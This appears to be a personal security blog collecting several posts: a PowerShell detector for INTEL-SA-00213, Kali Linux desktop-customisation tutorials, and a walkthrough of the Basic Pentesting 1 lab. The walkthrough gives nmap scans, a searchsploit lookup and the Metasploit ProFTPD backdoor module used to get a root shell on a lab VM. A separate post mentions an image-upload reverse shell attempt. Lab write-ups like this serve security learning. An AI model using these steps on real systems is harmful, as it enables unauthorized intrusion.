It’s been fun and educational putting my INTEL-SA-00213 Detection Script together: first writing it, refining it, adding SMB logging, getting feedback from the Reddit PowerShell folks, learning about the PSScriptAnalyzer, etc. But there comes a point where it’s time to walk away from something. This little tool does everything I need. I could tweak and add features, and obsess further, but why? What good will come of it? It’s been a neat little project, but it’s done.
I learned a good deal during this, so for my own mental retention, and to share them, let’s recap. There is a preferred order in which to arrange comment-based help. Temporary files are best handled using $env:TEMP and New-TemporaryFile. Don’t bother specifying Mandatory=$true or Mandatory=$false in parameters, as it’s implied. Use Write-Debug as a form of commenting instead of pure comments, as it has the added benefit of automatically adding -Verbose functionality. When testing a web path for validating a parameter, use the -Method Head option for Invoke-WebRequest to avoid downloading the file twice.
This was also my first project built fully in Visual Studio Code and GitHub, which I now love; I will never go back to my old way of version control. (Which was, admittedly, kludgey and stupid…)
All in all, a fun exercise which produced a tool that I will be using to check for and mitigate live vulnerabilities. If you use it let me know, I’d love to hear how it works out for you. If you want any new features or changes, I’d be happy to do that as well.
Following up on yesterday’s post about my INTEL-SA-00213 detection script, I’ve added some logging functionality. It’s rudimentary, but effective. Pass a valid -LogDir argument and it will generate a results.txt file. The file contains the hostname and output separated by a comma. The script uses Add-Content as well, so this can be run from multiple hosts and the results will be appended to existing content.
I plan to make the output file customizable via argument as well, and still need to tie this thing into SCCM. As it stands right now, though, version 2.0 or 2.2 could easily be used for a GPO startup script.
This is rapidly becoming more than just a utility script. I’ve never drilled this deep into parameters before and am learning quite a bit. It’ll be good to keep adding more functionality until I’ve got this thing well baked and I’ve learned as much as I can from it.
Anyway, if anyone is interested, here’s a link to the GitHub repository. I’m always looking for ideas and feedback!
So CVE-2019-0090 / INTEL-SA-00213 looks rather ugly, especially given that there is no software fix available. So, I need to see if any of my nodes are affected. To that end I’m putting together a quick and dirty PowerShell script to make scanning easier. As of now it can automatically download the Intel detection utility from the web (from a custom HTTP(S) location) or from SMB, then run it and report results.
In the next day or two I’m going to add the ability to log to a remote location and build out an SCCM package and hardware report.
You can pass the -DownloadFromWeb or -DownloadFromSMB arguments to tell the script how you’d like to obtain the file. You can also specify -WebURL and -SmbPath to tell the script to download from custom locations. By default the script will download the Intel utility directly from Intel. Stay tuned for updates.
If anyone is interested, here’s a link to the GitHub repository. I’m always looking for ideas and feedback!
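To show how the pieces described across these three posts fit together (comment-based help, a HEAD-validated -WebURL, New-TemporaryFile staging, and the comma-separated -LogDir append), here is an added illustration written for this page; it is not the script from the repository. The utility’s command-line switch and its output format are placeholders, and the example URL is a dummy.

```powershell
<#
.SYNOPSIS
    Download a vendor detection utility, run it, and append "hostname,output" to a shared log.
.DESCRIPTION
    Illustration of the patterns from the posts above; not the author's script.
    The utility's switch ('-placeholder') and output format are placeholders.
.PARAMETER WebURL
    HTTP(S) location of the utility. Checked with a HEAD request so the file is only
    downloaded once, after validation passes.
.PARAMETER LogDir
    Optional directory. When given, "COMPUTERNAME,output" is appended to results.txt there.
.EXAMPLE
    .\Invoke-DetectionScan.ps1 -WebURL 'https://example.invalid/tool.exe' -LogDir '\\fileserver\scanlogs' -Verbose
#>
[CmdletBinding()]
param(
    [Parameter(Mandatory)]
    [ValidateScript({ (Invoke-WebRequest -Uri $_ -Method Head -UseBasicParsing).StatusCode -eq 200 })]
    [string]$WebURL,

    [ValidateScript({ Test-Path -Path $_ -PathType Container })]
    [string]$LogDir
)

# Stage the download under $env:TEMP via New-TemporaryFile, then give it an .exe extension
# so the call operator will run it.
$tmp  = New-TemporaryFile
$tool = Join-Path $env:TEMP ($tmp.BaseName + '.exe')
Rename-Item -Path $tmp.FullName -NewName $tool

Write-Verbose "Downloading $WebURL to $tool"
Invoke-WebRequest -Uri $WebURL -OutFile $tool -UseBasicParsing

# Run the utility and flatten its output to one line so the log stays one record per host.
Write-Verbose 'Running detection utility'
$result = (& $tool '-placeholder' 2>&1 | Out-String).Trim() -replace '\r?\n', ' '

$record = "$env:COMPUTERNAME,$result"
Write-Output $record

if ($LogDir) {
    # Add-Content appends, so many hosts can write to the same results.txt on a share.
    Add-Content -Path (Join-Path $LogDir 'results.txt') -Value $record
}

Remove-Item -Path $tool -Force -ErrorAction SilentlyContinue
```

Because the validation runs before the body, a bad -WebURL fails fast without creating a temp file or touching the log.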
I spent far too long trying to enumerate this one… But I learned a good deal about a system I’ve never touched before, which is always a good thing. Once I got a foothold the rest was fairly quick to fall into place. Overall I liked it. Will be putting together a walk-through video of this one for sure.
Hacking things is an amazingly fun pastime. But also maddening sometimes. It’s now hour 8 of trying to crack “Postman” on HTB. I know what I need, but can I figure out how to get that thing? Nope. But, like most of the things I do, I’ll keep going because I know at the end it will be worth it. That feeling of accomplishment is like nothing else. This thing isn’t going to solve itself, so back to work!
So I’m working on a VM that looks to be exploitable via image upload.
It’s running Apache and PHP, and has a custom-made “upload image” form that leaves the images in a gallery. Should be easy enough, even for someone as inexperienced as me.
Well, today I learned not to use __halt_compiler() in an image-based reverse shell attempt when I accidentally crashed PHP. Once the image was uploaded it instantly crashed all pages that load that image. DOH. As an upshot, I suppose this proves the PHP code is working though. Back to it.
If you’d like to try an attack like this, there’s currently one on Hack The Box, I believe.
In this post I’m going to try my hand at Basic Pentesting 1 by Josiah Pierce. For the purpose of this article, command line entries and results will be in italics.
First things first, let’s find it with nmap.
nmap 192.168.1.0/24 > nmap-network_results.
which (among other things) turned up the following VM, which was new to my network.
Nmap scan report for vtcsec.pyrrh1c.net (192.168.1.227)
Host is up (0.0012s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:14:06:50 (Oracle VirtualBox virtual NIC)
Interestingly, it looks like its hostname is vtcsec (made a note of that…). Aside from that I see ftp, ssh, and http open. Let’s get some more details with nmap.
nmap -sV -O 192.168.1.227 > nmap-sv-o-results.txt
Which produced the following results.
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-05 11:32 EST
Nmap scan report for vtcsec.pyrrh1c.net (192.168.1.227)
Host is up (0.00094s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.3c
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 08:00:27:14:06:50 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.91 seconds
Ok, now we’ve got the versions of the services. Let’s see if there’s any low hanging fruit here. I’ll check searchsploit for the FTP server.
searchsploit proftpd 1.3.3c
The output didn’t copy neatly to this blog format (I run URXVT, so it’s likely some Unicode that won’t translate to ASCII neatly… whatever). I did find two options available; the one that interests me was “Backdoor Command Execution (Metasploit)”. So let’s fire up Metasploit and see what we can do.
Metasploit loads up
It runs and there it is: exploit/unix/ftp/proftpd_133c backdoor! This should be easy enough then.
set rhost 192.168.1.227
Voila. I got a shell. Let’s see who I am.
I’m root. Well damn. That was easy. I’m quite certain there’s other ways in though. So next time I’ll try some other routes in. That’s all for now.
If you haven’t gone through parts one and two, you should definitely do so before proceeding. In this tutorial we will cover installing the rofi application launcher, installing the polybar toolbar, and doing some additional tweaking to the UI elements.
This is fairly simple. Running “apt install rofi” will get the program installed. Then you just need to edit your ~/.i3/config file. Look for the line “bindsym Mod1+d exec dmenu_run” and replace it with “bindsym Mod1+d exec rofi -show run”. Log out, back in, test it, and if it works… SNAP THE VM.
Start by installing the prerequisites. Run the command “apt install cmake cmake-data libcairo2-dev libxcb1-dev libxcb-ewmh-dev libxcb-icccm4-dev libxcb-image0-dev libxcb-randr0-dev libxcb-util0-dev libxcb-xkb-dev pkg-config python-xcbgen xcb-proto libxcb-xrm-dev libasound2-dev libmpdclient-dev libiw-dev libcurl4-openssl-dev libpulse-dev mpd libxcb-composite0-dev”
Once that is done, download polybar by running “git clone https://github.com/jaagr/polybar.git”, then build it by running “cd polybar && ./build.sh”. You will be prompted to determine what you want to install; I just say yes to everything, YMMV. Do your homework on that.
To actually turn on polybar, comment out the following section:
status_command i3status -t
Add the following line (possibly adjusting for your system):
exec_always --no-startup-id polybar pyrrh1c &
Once polybar is installed, you will need to configure it. I could write a lengthy tutorial on that… But for the sake of brevity you can just download my polybar config file and look at how it’s set up. This is the one piece I couldn’t reduce to an easy walk through. Basically, just make a folder in your .config folder called polybar, then copy the config file into it.
Install some additional Fonts
Polybar uses some special unicode characters. This doesn’t work well unless you install the appropriate fonts. (mainly siji and unifont) You can install unifont by simply running “apt install unifont”. Install Siji by running the following commands:
git clone https://github.com/stark/siji.git
Once that’s done, add the following lines to your .bashrc file
xset +fp /root/.fonts
xset fp rehash
Compton is a desktop compositor. It basically helps glue things together. To get it running, just run “apt install compton”, then when it’s done edit your ~/.i3/config file and add the line “exec compton”. At this point your box should look somewhat like the one to the left.
Configure the Exit Sequence to Actually Exit
Edit your ~/.i3/config file. Look for the line “bindsym Mod1+Shift+e exec "i3-nagbar -t warning -m 'You pressed the exit shortcut. Do you really want to exit i3? This will end your X session.' …”. Change it to “bindsym Mod1+Shift+e exec i3-msg exit”. You will no longer be nagged when you want to exit.
That’s all for now. Stay tuned as I may do a more thorough overview for PolyBar at some point. Thanks for reading!
In this tutorial we will cover installing i3-gaps, the urxvt terminal emulator, feh, wal, and rofi. It’s assumed you went through part 1. If not, you may want to go read that now.
I’m not a fan of re-inventing the wheel. There’s a wonderful how-to for installing i3-gaps on Ubuntu that works well for Kali. Head over and follow it, then come back… Done? Great. Now reboot. At the log in screen enter the username, then after hitting next you’ll see a gear.
You’re now logged into the i3 window manager. This is a different world than most window managers. You will be very VERY well served by learning the basic commands and what they do. Take a few minutes to go over the i3 Reference Card and learn how to open up new terminal windows.
So you have probably noticed the ugly red error message by now. That’s a result of the i3 status bar being referenced, but not installed. There are several options available for status bars (the i3 bar, polybar, lemonbar, etc.); this series will just add the basic status bar for now. Maybe polybar later. We’ll see.
So go ahead and open a terminal window (usually by hitting [alt] + [enter]) and enter the following command: apt install i3status. Once that’s done, log out ([alt] + [shift] + [e]) and back in. You should now see the red/white/green status bar. i3 is now ready to go in its most basic form.
Replace the default console app with URXVT
The default terminal doesn’t offer much flexibility so I like to replace it. My terminal of choice is URXVT. Install the URXVT terminal by running apt install rxvt-unicode.
Take a Snapshot!
Things are about to start getting messy. Snapshot now or proceed at your own peril. 😉
Make URXVT the default terminal in i3
I’ll assume you know how to edit text files in Linux. If not, here’s a link to using vi. I won’t lie though, if you are trying to Rice Kali Linux, and you don’t know how to edit a text file, I genuinely wonder how you ended up here. 😉
Anyway, edit the i3 config file which is ~/.i3/config. In there, find the line “bindsym Mod1+Return exec i3-sensible-terminal” and replace it with “bindsym Mod1+Return exec /usr/bin/urxvt”. Once it’s saved exit out of all terminal windows and reload the i3 config by pressing [alt]+[shift]+[r].
Remove the URXVT Scroll Bars and Apply Transparency
Create the file ~/.Xdefaults, and in it enter the following lines to get rid of the scrollbar and apply transparency (NOTE THE CAPITAL “B”!!!):
URxvt*scrollBar: false
URxvt*transparent: true
URxvt*shading: 40
Install feh to Add a Wallpaper
Download a wallpaper you like, and save it somewhere easy to access.
(I’ll leave how you download it up to you…) I usually put it in /wallpapers and name it wallpaper.png or something similar. Install feh by running “apt install feh”. Once it’s done, edit your ~/.i3/config file to add the line:
exec --no-startup-id feh --bg-scale '/wallpapers/wallpaper.jpeg'
You now have a scaled background each time you log in. That said, the text is kind of an odd color. Let’s fix that.
Install and Configure PyWal
Running feh without pywal can make for some ugly (and possibly unusable) color schemes for the terminal. To fix that we use PyWal. Install python3-pip by running “apt install python3-pip”, then install pywal by running “pip3 install pywal”. Once that’s done, add the following lines at the end of your .bashrc (according to the documentation you should put this in the .i3/config file but it NEVER LAUNCHES FOR ME!!!):
wal -i /wallpapers/wallpaper.jpeg
clear
Tighten up Those Gaps!
The tutorial is good, but I prefer a smaller gap.
So edit your ~/.i3/config file and update the following lines:
gaps inner 10
gaps outer 0
We made some serious progress here. We installed i3, the i3 status bar, URXVT, feh, and PyWal. We also configured some transparency and colors. Stay tuned for Part 3 where we’ll dig a little deeper and install rofi, polybar, and other fun stuff! Follow @_pyrrh1c_
In this tutorial I’m going to show you the basic techniques I use when ricing Kali Linux. But in case you don’t already know, let’s explain what ricing is first. Urban Dictionary defines ricing like this: “Ricing: To rice, or to soup up a crappy car with the mistaken idea that type ‘R’ stickers and performance yellow paint make it go faster.” In the spirit of that, the tweaks explained here don’t technically make Kali a more effective offensive security platform in and of themselves, but I find they make the interface easier to use, hence they boost my productivity. Let’s be honest, who doesn’t like a customized environment?
You can obtain the latest builds (ISO images, OVA templates, etc.) from the Kali Linux download page or from the Offensive Security downloads page. For this tutorial, I’m going to deploy Kali virtually using VirtualBox. For the remainder of the tutorial, I’ll assume you are doing the same thing. You can obtain VirtualBox from their download page.
Since we’re using VirtualBox, I downloaded and imported the 2018.4 OVA template from Offensive Security. If you need help doing that, take a look at the documentation. I named my machine “Pyrrh1c Linux” to differentiate it later from a stock Kali VM.
Immediately after you import the OVA, take a snapshot of the VM. I usually name it something like “VM Imported”. This allows me to undo any changes since the last snapshot was taken, which is important because mistakes happen, and it’s nice to only have to do one step over again instead of numerous.
Power on the machine, and you will shortly be at the login screen. No install required! If you are following along and doing a traditional install of Kali and need some pointers for the install process, you may want to take a look at the Kali Linux Official Documentation.
Initial OS Preparations
Open up a terminal window and run the commands “apt update”, then “apt upgrade”. This ensures you have all the latest packages on your install. Go pour out a glass of Kraken, this will take a minute… When you get to the step that asks about grub, use the space bar to select /dev/sda and hit OK.
Ready to Go
With the OS installed and updated we are ready to get started customizing. Part 2 will cover installing the i3 window manager, feh, wal and rofi. That’s all for now!